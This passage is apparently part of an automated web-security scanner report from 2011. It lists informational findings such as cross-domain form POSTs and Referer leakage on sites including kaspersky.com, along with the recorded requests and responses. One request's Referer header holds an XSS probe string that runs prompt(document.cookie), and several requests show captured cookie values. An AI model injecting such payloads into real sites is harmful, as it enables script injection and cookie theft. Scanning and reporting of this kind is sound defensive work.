Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.3.56
X-Cnection: close
Date: Sun, 04 Sep 2011 12:12:55 GMT
Content-Length: 24442

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e636b47186242c35225283" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=scmagazine.com.au&placement=like_button&extra_1=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx&layout=standard&show_faces=false&width=270&action=like&font&colorscheme=light&height=30 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.171.40
X-Cnection: close
Date: Sun, 04 Sep 2011 12:13:02 GMT
Content-Length: 24235

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e636b4e859d35175804004" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_e
...[SNIP]...

13.3. http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.h-online.com
Path:	/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html

Request 1

GET /security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html HTTP/1.1
Host: www.h-online.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:54 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 40431
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<meta http-
...[SNIP]...
<a href="http://ad-emea.doubleclick.net/N6514/jump/uk/uk-security;sz=300x250,336x280;tile=1;ord=3809903068?" target="_blank"><img alt="" src="http://ad-emea.doubleclick.net/N6514/ad/uk/uk-security;sz=300x250,336x280;tile=1;ord=3809903068?" /></a></div></noscript>
</div>
               </div>






<div class="newest_news_teaser">
<img src="/imgs/43/6/6/3/4/7/0/The-H_Security_Headlines-aa9abb476998b71b.gif" width="232" height="24" alt="The H Open Headlines" />
<ul>

<li>
<a href="/news/item/The-H-Roundup-for-the-week-ending-3-September-1335868.html" title="In the last seven days: Ubuntu 11.10 Beta 1, Rails 3.1, fake Google certificates, worms, GNOME 3.2, SCO vs Linux - the most read news, the security alerts and open source releases, and the essential feature articles that have appeared on The H this week" class="top">The H Roundup for the week ending 3 September</a>
</li>

<li>
<a href="/news/item/TrueCrypt-7-1-brings-full-Mac-OS-X-Lion-support-1335780.html" title="Version 7.1 of the open source disk encryption tool is the project's first release in nearly a year, adding full support for 32- and 64-bit versions of Mac OS X 10.7 Lion" >TrueCrypt 7.1 brings full Mac OS X Lion support</a>
</li>

<li>
<a href="/news/item/More-arrests-of-suspected-Anonymous-LulzSec-members-1335713.html" title="Police say arrested men suspected of committing offences while using the online identity of "Kayla"" >More arrests of suspected Anonymous/LulzSec members</a>
</li>

<li>
<a href="/news/item/Windows-8-to-include-secure-boot-using-UEFI-2-3-1-1335246.html" title="It should be possible to cryptographically secure the process of booting and loading UEFI drivers on future desktops and laptops" >Windows 8 to include secure boot using UEFI 2.3.1</a>
</li>

<li>
<a href="/news/item/Attackers-behind-CA-hack-also-targeted-Tor-1335630.html" title="Twelve c
...[SNIP]...

Request 2

GET /security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html HTTP/1.1
Host: www.h-online.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:15:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 40122
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<meta http-
...[SNIP]...
<a href="http://ad-emea.doubleclick.net/N6514/jump/uk/uk-security;sz=300x250,336x280;tile=1;ord=3161374287?" target="_blank"><img alt="" src="http://ad-emea.doubleclick.net/N6514/ad/uk/uk-security;sz=300x250,336x280;tile=1;ord=3161374287?" /></a></div></noscript>
</div>
               </div>






<div class="newest_news_teaser">
<img src="/imgs/43/6/6/3/4/7/0/The-H_Security_Headlines-aa9abb476998b71b.gif" width="232" height="24" alt="The H Open Headlines" />
<ul>

<li>
<a href="/news/item/The-H-Roundup-for-the-week-ending-3-September-1335868.html" title="In the last seven days: Ubuntu 11.10 Beta 1, Rails 3.1, fake Google certificates, worms, GNOME 3.2, SCO vs Linux - the most read news, the security alerts and open source releases, and the essential feature articles that have appeared on The H this week" class="top">The H Roundup for the week ending 3 September</a>
</li>

<li>
<a href="/news/item/TrueCrypt-7-1-brings-full-Mac-OS-X-Lion-support-1335780.html" title="Version 7.1 of the open source disk encryption tool is the project's first release in nearly a year, adding full support for 32- and 64-bit versions of Mac OS X 10.7 Lion" >TrueCrypt 7.1 brings full Mac OS X Lion support</a>
</li>

<li>
<a href="/news/item/More-arrests-of-suspected-Anonymous-LulzSec-members-1335713.html" title="Police say arrested men suspected of committing offences while using the online identity of "Kayla"" >More arrests of suspected Anonymous/LulzSec members</a>
</li>

<li>
<a href="/news/item/Windows-8-to-include-secure-boot-using-UEFI-2-3-1-1335246.html" title="It should be possible to cryptographically secure the process of booting and loading UEFI drivers on future desktops and laptops" >Windows 8 to include secure boot using UEFI 2.3.1</a>
</li>

<li>
<a href="/news/item/Attackers-behind-CA-hack-also-targeted-Tor-1335630.html" title="Twelve c
...[SNIP]...

14. Cross-domain POST previous next
There are 4 instances of this issue:

http://devirusare.com/x26amp
http://devirusare.com/x26amp
http://www.kaspersky.com/pure-trial-register
http://www.sophelle.com/Contact-Us/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

14.1. http://devirusare.com/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://devirusare.com
Path:	/x26amp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET /x26amp HTTP/1.1
Host: devirusare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.2. http://devirusare.com/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://devirusare.com
Path:	/x26amp

Issue detail

The page contains a form which POSTs data to the domain www.virustotal.com. The form contains the following fields:

archivo
distribuir
sub

Request

GET /x26amp HTTP/1.1
Host: devirusare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.3. http://www.kaspersky.com/pure-trial-register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/pure-trial-register

Issue detail

The page contains a form which POSTs data to the domain tre.emv3.com. The form contains the following fields:

emv_tag
emv_ref
PRODUCT_NAME_FIELD
REPORTING_DATE_FIELD
LOCALE_FIELD
EMAIL_FIELD
OPT_IN_EMAIL_IND_FIELD

Request

GET /pure-trial-register HTTP/1.1
Host: www.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26524
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 14:06:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
</script>

<form target="_top" method="POST" action="http://tre.emv3.com/D2UTF8" id="emvForm" name="emvForm">
<input type="hidden" value="4000192CC57C0A40" name="emv_tag">
...[SNIP]...

14.4. http://www.sophelle.com/Contact-Us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Contact-Us/

Issue detail

The page contains a form which POSTs data to the domain sophelle.web5.hubspot.com. The form contains the following fields:

FormSubmitRedirectURL
Lead_Src
LeadGen_ContactForm_14884_m0submitter_user_token
ContactFormId
LeadGen_ContactForm_14884_m0spam_check_key
LeadGen_ContactForm_14884_m0spam_check_sig
LeadGen_ContactForm_14884_m0:FirstName
LeadGen_ContactForm_14884_m0:LastName
LeadGen_ContactForm_14884_m0:Company
LeadGen_ContactForm_14884_m0:JobTitle
LeadGen_ContactForm_14884_m0:Email
LeadGen_ContactForm_14884_m0:Phone
LeadGen_ContactForm_Submit_LeadGen_ContactForm_14884_m0

Request

GET /Contact-Us/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotdt=2011-09-04%2010%3A56%3A01; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.4.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 10039
Content-Type: text/html
Content-Location: http://www.sophelle.com/Contact-Us/index.html
Last-Modified: Tue, 26 Apr 2011 13:15:36 GMT
Accept-Ranges: bytes
ETag: "a042c37144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
</p>

<form action="http://sophelle.web5.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=14884" method="post">
<input type="hidden" name="FormSubmitRedirectURL" id="FormSubmitRedirectURL" value="http://www.sophelle.com/Contact-Us/thank-you.html" >
...[SNIP]...

15. Cross-domain Referer leakage previous next
There are 60 instances of this issue:

http://ad-apac.doubleclick.net/adj/scmagazine/webclient
http://ad-apac.doubleclick.net/adj/scmagazine/webclient
http://ad.doubleclick.net/adi/idge.nww.home/
http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/
http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/
http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/
http://ad.doubleclick.net/adj/idge.nww.home/
http://ad.doubleclick.net/adj/idge.nww.home/
http://ad.doubleclick.net/adj/idge.nww.home/
http://ad.doubleclick.net/adj/idge.nww.home/
http://ad.doubleclick.net/adj/idge.nww.home/
http://ad.doubleclick.net/adj/ssec/TIPS
http://ad.doubleclick.net/adj/ssec/TIPS
http://ads.pointroll.com/PortalServe/
http://amch.questionmarket.com/adscgen/d_layer.php
http://bp.specificclick.net/
http://cm.g.doubleclick.net/pixel
http://corporate.digitalriver.com/store
http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
http://disqus.com/forums/scmagazine/popular_threads_widget.js
http://disqus.com/forums/scmagazine/recent_comments_widget.js
http://forum.kaspersky.com/index.php
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://img.mediaplex.com/content/0/15949/135754/Capacity_Banner_3_640x480.js
http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js
http://mi.adinterax.com/customer/computerworld/NWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus.ns.js
http://office.microsoft.com/client/searchresults14.aspx
http://reservoir.marketstudio.net/reservoir
http://s7.addthis.com/js/250/addthis_widget.js
http://sophelle.web5.hubspot.com/Default.aspx
http://usa.kaspersky.com/
http://usa.kaspersky.com/products-services/home-computer-security/pure
http://www.facebook.com/plugins/likebox.php
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.kaspersky.com/
http://www.maas360.com/themes/maasweb2011/css/form.css
http://www.networkworld.com/
http://www.securelist.com/en/find
http://www.theregister.co.uk/Design/javascript/_.js

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

15.1. http://ad-apac.doubleclick.net/adj/scmagazine/webclient previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/adj/scmagazine/webclient

Issue detail

The page was loaded from a URL containing a query string:

http://ad-apac.doubleclick.net/adj/scmagazine/webclient;aid=268907;cat=webclient;kwd=kaspersky;kwd=xss;kwd=vulnerabilities;kwd=exploits;type=news;pos=footer;sz=728x90;tile=6;ord=1510808079037815.2?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/scmagazine/webclient;aid=268907;cat=webclient;kwd=kaspersky;kwd=xss;kwd=vulnerabilities;kwd=exploits;type=news;pos=footer;sz=728x90;tile=6;ord=1510808079037815.2? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 248
Date: Sun, 04 Sep 2011 12:13:06 GMT

document.write('<a target="_blank" href="http://ad-apac.doubleclick.net/6k;h=v8/3b78/0/0/%2a/s;44306;0-0;0;63118545;3454-728/90;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.2. http://ad-apac.doubleclick.net/adj/scmagazine/webclient previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/adj/scmagazine/webclient

Issue detail

The page was loaded from a URL containing a query string:

http://ad-apac.doubleclick.net/adj/scmagazine/webclient;aid=268907;cat=webclient;kwd=kaspersky;kwd=xss;kwd=vulnerabilities;kwd=exploits;type=news;pos=sto;sz=300x250;tile=3;ord=1510808079037815.2?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1304394/7438_SC_300X250_MPU4-40k.gif

Request

GET /adj/scmagazine/webclient;aid=268907;cat=webclient;kwd=kaspersky;kwd=xss;kwd=vulnerabilities;kwd=exploits;type=news;pos=sto;sz=300x250;tile=3;ord=1510808079037815.2? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Date: Sun, 04 Sep 2011 12:13:12 GMT

document.write('<a target="_blank" href="http://ad-apac.doubleclick.net/6k;h=v8/3b78/0/0/%2a/t;245737580;0-0;1;63118545;4307-300/250;43848291/43866078/1;;~sscs=%3fhttp://www.scmagazine.com.au"><img src="http://s0.2mdn.net/viewad/1304394/7438_SC_300X250_MPU4-40k.gif" border=0 alt="click here"></a>
...[SNIP]...

15.3. http://ad.doubleclick.net/adi/idge.nww.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/idge.nww.home/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/idge.nww.home/;pos=bottomleaderboard;sz=728x90;tile=16;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=2665094938021218.5?

The response contains the following links to other domains:

http://s0.2mdn.net/2685217/GutCheck-Static.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/idge.nww.home/;pos=bottomleaderboard;sz=728x90;tile=16;author=network_world_staff;cid=75931;kw=;compsz=undefined;indust=undefined;empcnt=;referrer=fakereferrerdominator;contenttype=homepage;insiderauth=no;ord=2665094938021218.5? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 3469
Date: Sun, 04 Sep 2011 14:47:02 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>


<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3Dv8/3b78/3/0/%2a/d%3B242857654%3B0-0%3B2%3B43070067%3B3454-728/90%3B43203339/43221126/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3fhttp://gutcheckit.com/?utm_source=Networkworld&utm_campaign=IDG-banners"><img src="http://s0.2mdn.net/2685217/GutCheck-Static.gif" border="0" alt="" ></a>
...[SNIP]...

15.4. http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/idge.cpw.security/cybercrimehacking/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/;cid=18810;kw=cybercrime_%26_hacking,internet,privacy,security,security_hardware_%26_software,breach,cybercrime,hack,hacker_rankings,hackers,hacking,internet,rankmyhack;author=darlene_storm;page_type=blog;blog_name=security_is_sexy;pos=dogear;sz=1x1;tile=5;dcopt=ist;compsz=undefined;indust=undefined;empcnt=;referrer=google;insiderauth=no;ord=5992585949134082?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/idge.cpw.security/cybercrimehacking/;cid=18810;kw=cybercrime_%26_hacking,internet,privacy,security,security_hardware_%26_software,breach,cybercrime,hack,hacker_rankings,hackers,hacking,internet,rankmyhack;author=darlene_storm;page_type=blog;blog_name=security_is_sexy;pos=dogear;sz=1x1;tile=5;dcopt=ist;compsz=undefined;indust=undefined;empcnt=;referrer=google;insiderauth=no;ord=5992585949134082? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 254
Date: Sun, 04 Sep 2011 12:13:47 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/h;44306;0-0;0;70077431;31-1/1;0/0/0;;~aopt=2/0/25/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.5. http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/idge.cpw.security/cybercrimehacking/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/idge.cpw.security/cybercrimehacking/;cid=18810;kw=cybercrime_%26_hacking,internet,privacy,security,security_hardware_%26_software,breach,cybercrime,hack,hacker_rankings,hackers,hacking,internet,rankmyhack;author=darlene_storm;page_type=blog;blog_name=security_is_sexy;pos=topleaderboard;sz=728x90,950x98,989x125,970x98,970x268;tile=1;dcopt=ist;compsz=undefined;indust=undefined;empcnt=;referrer=google;insiderauth=no;ord=5992585949134082?

The response contains the following link to another domain:

http://s0.2mdn.net/3268888/PID_1674894_Collapsed_Content.jpg

Request

GET /adj/idge.cpw.security/cybercrimehacking/;cid=18810;kw=cybercrime_%26_hacking,internet,privacy,security,security_hardware_%26_software,breach,cybercrime,hack,hacker_rankings,hackers,hacking,internet,rankmyhack;author=darlene_storm;page_type=blog;blog_name=security_is_sexy;pos=topleaderboard;sz=728x90,950x98,989x125,970x98,970x268;tile=1;dcopt=ist;compsz=undefined;indust=undefined;empcnt=;referrer=google;insiderauth=no;ord=5992585949134082? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 52432
